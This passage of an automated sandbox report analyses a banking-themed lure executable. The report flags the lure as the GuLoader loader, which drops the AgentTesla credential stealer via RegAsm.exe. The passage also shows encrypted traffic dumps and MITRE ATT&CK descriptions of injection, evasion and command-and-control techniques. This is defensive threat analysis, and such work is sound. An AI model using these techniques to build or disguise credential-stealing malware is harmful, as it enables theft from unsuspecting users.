2021-09-15 05:14:39 UTC	156	IN	Data Raw: a7 14 9d 65 1e fe 68 14 fe d0 f4 65 8a 87 71 c5 8d a0 e8 c9 12 23 df ae a4 d4 64 e1 1e 2c cd 61 a6 98 39 3b e5 59 69 e8 63 a3 46 30 e0 b1 4b a7 f0 13 36 6c 39 4b d4 c9 28 3c 60 b1 26 3d 3e 8e aa 33 b0 68 13 ed 15 14 ac 9c e2 d2 d7 3c ba b8 9a 19 4a 2a 65 fc d0 89 a7 61 73 da 94 66 70 37 82 fd 26 91 60 1f 66 40 6c a5 7f 96 db 9a 5e f8 fe 49 12 28 c8 54 14 76 a8 8e c6 04 46 a7 71 f4 0c 30 79 cf f0 06 af f5 6e 62 84 2e 50 e1 6e d9 5a 8b 52 87 a4 fd 10 be 8d 76 1e 23 da fc ac b3 86 22 fe 55 5a 1b 17 6f 07 76 02 22 10 75 12 df 2b 6f a9 f7 c7 45 5b 72 a3 f3 75 1e e2 fe 61 fe c6 7e b0 c9 41 84 b7 67 f6 c9 93 3b 7e e4 88 f5 cc 6c 4d 52 ac 31 ae b2 bd 39 12 0b 4b 35 89 31 86 a6 42 03 f8 3b e2 b7 8e ce 83 18 49 08 69 e2 4a 30 2d 51 fa f3 65 04 b2 0e 29 d3 72 b8 b3 Data Ascii: eheq#d,a9;YicF0K6l9K(<`&=>3h<J*easfp7&`f@l^I(TvFq0ynb.PnZRv#"UZov"u+oE[rua~Ag;~lMR19K51B;IiJ0-Qe)r
2021-09-15 05:14:39 UTC	164	IN	Data Raw: c8 b5 d0 05 f8 32 f5 32 99 f0 23 04 83 63 91 63 89 d9 ea ce 3d 59 22 c9 a6 79 f1 d7 a4 3a 28 9e 76 7f f5 41 d8 d0 d5 2b 81 2a 4e f5 e1 e9 cd c2 5d 13 da 98 20 81 50 4a 6d 68 70 b2 9d 7f ab d2 f1 aa 32 b6 d3 a4 3f 42 2b 8c 01 ec 25 76 b2 7d 0a 0b 84 f5 98 c3 45 1b 96 5c 07 55 96 76 1d 8e 04 ea f6 57 99 e4 79 10 0a 69 de 9c a0 92 19 bd 88 95 c7 07 4f 3a 05 53 7a 80 f6 8b cd 8c cc 54 af 04 57 c2 95 b8 3e b0 eb 55 6b a6 05 f5 0e dc da e9 a0 01 52 9c 88 f2 4a d4 82 be 18 4d 28 ac ac 1a d8 ea 28 d1 ff dc 2c 92 7f 22 bb df 56 a2 c6 4c 3e 64 fa 9f e2 84 46 27 54 be 61 9b 3d e2 97 53 1c de ed a7 c3 64 71 fa d4 fe c2 7c e6 b1 6d 4d d9 59 e9 80 c2 a3 18 6b 85 96 8d f1 85 e5 7c a0 a3 7b 44 c4 04 2d ca aa ed 73 6c 7a 21 08 c4 e6 37 85 2d 25 d5 54 71 f2 7d 31 0d 1e c8 Data Ascii: 22#cc=Y"y:(vA+*N] PJmhp2?B+%v}E\UvWyiO:SzTW>UkRJM((,"VL>dF'Ta=Sdq\|mMYk\|{D-slz!7-%Tq}1
2021-09-15 05:14:39 UTC	172	IN	Data Raw: 3d 07 ac a4 1d 7e 6a 86 a4 42 04 ea 16 b1 60 69 23 54 ca 46 11 a1 d5 2e 8f c4 f2 ba e1 70 5e b9 84 bb 54 06 9a 64 67 73 20 cc 47 52 09 44 b0 74 4b 73 fb 39 81 81 9b 00 0f da 51 65 40 7c fb 0a d7 e4 4f b6 c5 01 5c f6 7e 43 82 36 a6 f6 ce 46 e9 77 dc f0 83 15 7d 9c 65 df 5e 23 bb a1 03 56 98 35 1f fe a9 b6 21 6b 01 3f 81 82 00 3f 78 e4 d6 d5 b5 d6 57 7e 77 e9 97 dd 48 3c 39 3c c0 75 23 e0 0e 2a d0 e0 ff c9 91 07 4b eb cf c7 17 cf 3c ec a2 0a f6 88 8b 66 cd 8f f2 22 20 6d 39 83 de ae 93 30 fe ba 3e 75 e3 bc 9a 6f 55 a4 46 9a 98 08 22 98 3a bf fc ff 41 ed f8 d1 92 52 9d 18 13 ff e6 f3 2b 2a 34 b7 5c 13 14 43 d1 79 5f 44 3b c1 c7 90 d0 93 f8 d7 f1 d7 9b cb 20 5d 9a a3 9e 46 89 4f ea 67 1c bc 20 b2 be 47 c6 24 a6 1f 28 08 76 69 f0 a4 da eb d6 39 98 9d 41 d0 e1 Data Ascii: =~jB`i#TF.p^Tdgs GRDtKs9Qe@\|O\~C6Fw}e^#V5!k??xW~wH<9<u#K<f" m90>uoUF":AR+4\Cy_D; ]FOg G$(vi9A
2021-09-15 05:14:39 UTC	180	IN	Data Raw: 4c 8a ce 64 58 fc 61 02 d8 46 68 a2 70 3e b2 28 b7 b5 21 20 48 e2 64 e1 e0 42 7c d5 57 d7 6c ae 60 89 af 09 72 a4 65 23 e8 97 98 22 71 4b 69 69 d9 6c 49 53 36 1d 9d bc 6c 36 49 32 aa 81 8e c6 fe ea b5 2c 42 e3 3f 25 56 34 de 1e c0 75 6e 5d e9 cc 06 6c 5d 4b 6d d1 00 28 2e bc 44 ba 93 89 47 32 0a f6 b9 c9 30 dc 58 f7 e9 17 00 d8 6c 1e 8c eb 57 b3 a0 40 32 49 a1 cf 08 44 26 65 cc c3 be 74 39 63 a0 05 aa ef 20 ad 5e 33 b5 f8 d2 5f 86 fd 13 35 48 fd d4 f2 f6 17 6a 6a a3 cd 32 d2 15 16 fe c6 0a 35 72 43 0d d8 f4 98 52 21 18 89 bd da 05 86 01 85 37 0b 0b ea 18 13 9a a7 74 32 40 2b 96 70 cc c3 e9 54 47 c2 21 cf 68 1d fd 98 55 a8 1c e1 ae 4f 1d ae 21 62 a6 3f 04 68 06 6c 64 8f 21 bf ca c4 4f 45 d7 53 8f 64 e2 db c0 96 5c 52 84 cc 1e e2 98 19 67 b2 30 de 42 b4 0b Data Ascii: LdXaFhp>(! HdB\|Wl`re#"qKiilIS6l6I2,B?%V4un]l]Km(.DG20XlW@2ID&et9c ^3_5Hjj25rCR!7t2@+pTG!hUO!b?hld!OESd\Rg0B
2021-09-15 05:14:39 UTC	187	IN	Data Raw: ed 97 97 49 3f 35 9f c3 14 c7 f7 1d f0 c2 6d e5 81 b9 d6 d9 7c ee 32 aa ad 18 6b 0a 81 50 7b 84 81 6b 98 42 b2 e6 c4 ca 31 17 a6 ed e4 bd c2 f8 23 c4 7a 59 af e4 2b d5 45 b4 d4 b3 ad 1d 3b 45 b9 a4 92 d1 2b 9d 0d f0 77 f0 eb fa 1b 98 8c 1c 09 f3 94 53 05 88 56 2c e9 3b 39 88 85 a9 19 1f c9 7f 7f 79 ef 40 bb 87 3f a9 55 7a b5 a2 13 23 8d a7 fe 51 6f 4f 4d 69 de 96 95 1a 5f 83 6c 24 51 a7 04 de a2 f8 df 48 bb a0 87 40 64 e8 f3 7d 5d ab 06 c0 d6 43 27 4d d7 8d 32 41 9e 7f b0 00 2f 87 5b d6 0f 80 1b 6f 6d 96 0b e4 ee b3 a3 6c 65 1d 28 35 ac 6a c2 4e b7 d6 f7 91 eb c9 e9 45 c1 b2 7d e4 e3 24 64 61 f6 15 94 c4 57 d6 ab df 6e 35 67 6c cc db 57 49 13 00 d8 e9 45 e7 6d 21 a5 26 9f 72 08 03 13 e6 63 dd fe d4 7c 1d 59 f8 60 d3 60 01 fd c2 7c a4 65 7d eb 17 81 c4 73 Data Ascii: I?5m\|2kP{kB1#zY+E;E+wSV,;9y@?Uz#QoOMi_l$QH@d}]C'M2A/[omle(5jNE}$daWn5glWIEm!&rc\|Y``\|e}s
2021-09-15 05:14:39 UTC	195	IN	Data Raw: 0f 13 7f 9d f1 6e 40 34 67 36 2c 72 cf d3 4c 35 a2 4b a9 c7 f2 ba 05 9b 58 f5 55 f3 b6 45 30 88 c7 f4 46 ee b3 ea 8c 56 5a 61 a4 be 2a bf 26 e3 74 28 d8 1d 7f b2 29 d8 de bd 72 eb f4 41 b2 8a e9 8c b1 24 7e b9 9d 42 a2 37 30 03 2e 1b b2 fa 1a df 8e b2 8d 41 9b 94 09 53 0c 2b d8 73 8d 4b 06 d4 14 60 71 e7 6d f4 87 29 59 fa 33 64 3d 96 64 6c b6 61 50 9f 1d eb 89 3b 7c 65 09 b5 da c7 b6 12 0c e2 c4 98 44 2e 54 56 35 1f ad f5 b3 ad 0f a4 1a af f0 a8 b6 ca d3 5c ce 98 48 3d 45 71 8f 65 0a 97 82 a0 43 3e 9a d3 89 6f 83 ee 9b 5d 91 b2 ea c0 1a 9f 95 28 0e 92 31 75 d6 13 56 61 b3 3a cd a5 15 79 01 92 7b 83 cd 46 7d b9 db 04 d3 7a 9f f8 f5 7c 5f e2 cf a2 66 9d 92 b5 92 c2 23 83 fa 1d a4 ab 17 aa 6a 06 c7 7d 05 f1 ee ec 0a 84 c5 09 e6 ca c2 87 a8 04 7e b3 c8 99 81 Data Ascii: n@4g6,rL5KXUE0FVZa*&t()rA$~B70.AS+sK`qm)Y3d=dlaP;\|eD.TV5\H=EqeC>o](1uVa:y{F}z\|_f#j}~
2021-09-15 05:14:39 UTC	203	IN	Data Raw: 57 32 cb ff a6 ad 56 eb 29 43 11 7f cf 60 19 fd 0f 49 8d 39 27 ad 30 01 5f 7a 62 ae 37 07 de 06 bb 65 6e 21 d0 ff db 14 47 d6 41 ba e3 db bc c1 70 4c 1a 80 f3 41 ee 90 1a 47 24 3e cb 40 50 17 d2 b8 a9 56 95 fc 54 80 f9 95 02 0b d0 50 ed 40 ed f3 ed d4 87 4f 31 d5 07 5b f7 60 d5 85 0f a3 11 cd 2b f7 cc cb d2 87 14 73 04 6b b3 25 c4 b9 e8 50 f3 fb 43 7a 93 87 77 44 3a 2b 8a e6 8d 76 ab 0b 83 a5 fb e5 32 38 2b 03 6c fa cc 3b 0c 7b 51 a1 05 6b 02 7a 3d 97 6a 94 d1 ff 4c 0a 9b a0 b3 78 3a 53 6f af af 86 90 ea 72 b9 d2 ad 6b 4e 88 4d 73 b4 2b f4 12 a1 28 6b 1e 90 cc f5 8a 30 f7 38 35 f4 06 56 5b 45 de 99 a0 1e 7b f8 6a 95 b2 8c 65 16 3c f5 e2 2b 22 32 34 4e 34 34 b6 d3 06 4c a2 2e c9 c6 83 d0 01 d0 32 e6 31 9d 96 21 5b 8a a4 9f 46 89 d9 ea cd 3b 4b 02 cd b8 6c Data Ascii: W2V)C`I9'0_zb7en!GApLAG$>@PVTP@O1[`+sk%PCzwD:+v28+l;{Qkz=jLx:SorkNMs+(k085V[E{je<+"24N44L.21![F;Kl
2021-09-15 05:14:39 UTC	211	IN	Data Raw: 92 fc b3 7f ae d3 07 4a 7c ea e1 8d 05 51 ca a3 65 46 d3 52 70 d1 05 45 ff 32 07 df 43 60 3a 78 29 ad cb 95 ca 2f 0b 1d ea 63 e7 fc c9 72 47 5a 39 66 db 69 cb f7 16 77 b9 60 a7 68 2f a5 c3 64 23 7b 8e 1b 6f 5b d2 76 93 93 19 7d bd 43 41 b7 03 c7 45 be e2 a7 d7 50 aa 9c cd 49 4c d6 be 89 1e 66 40 e7 52 0e 67 51 a8 4f ae 01 f9 77 b5 44 bf 9b 07 49 f0 1b 00 a9 34 84 3f 23 f7 e8 06 83 db 7d b0 11 01 54 ce a3 4b 6e 4b a0 cf 08 d2 26 60 db 24 bc 0a 39 4f fc 05 aa ef 20 3b 5e 6a b1 18 d8 30 06 07 41 3f 58 f5 c9 61 e6 c7 63 8b ac a1 b3 89 54 11 e6 de 12 be 77 ca 0b 3c eb e0 5a b8 55 0a 89 de 05 11 00 9f 18 cd 0c 8a 1d bc c3 b8 71 2f 45 a0 93 d8 cd 21 cb 28 4f 0e 74 ca 6e 00 f8 0c 57 89 25 0e aa 12 1e 43 73 6e a8 31 03 f6 04 ab 7d 6c 3b ca d7 d6 1b 5a ca 56 87 d2 Data Ascii: J\|QeFRpE2C`:x)/crGZ9fiw`h/d#{o[v}CAEPILf@RgQOwDI4?#}TKnK&`$9O ;^j0A?XacTw<ZUq/E!(OtnW%Csn1}l;ZV

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: HSBC Customer Information.exe PID: 6392 Parent PID: 5532

General

Start time:	07:11:04
Start date:	15/09/2021
Path:	C:\Users\user\Desktop\HSBC Customer Information.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\HSBC Customer Information.exe'
Imagebase:	0x400000
File size:	122880 bytes
MD5 hash:	448F83467C61E465162DAF7CF8D9E88F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: RegAsm.exe PID: 6140 Parent PID: 6392

General

Start time:	07:12:57
Start date:	15/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\HSBC Customer Information.exe'
Imagebase:	0xbf0000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: conhost.exe PID: 5140 Parent PID: 6140

General

Start time:	07:12:58
Start date:	15/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report HSBC Customer Information.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Code Manipulations

Statistics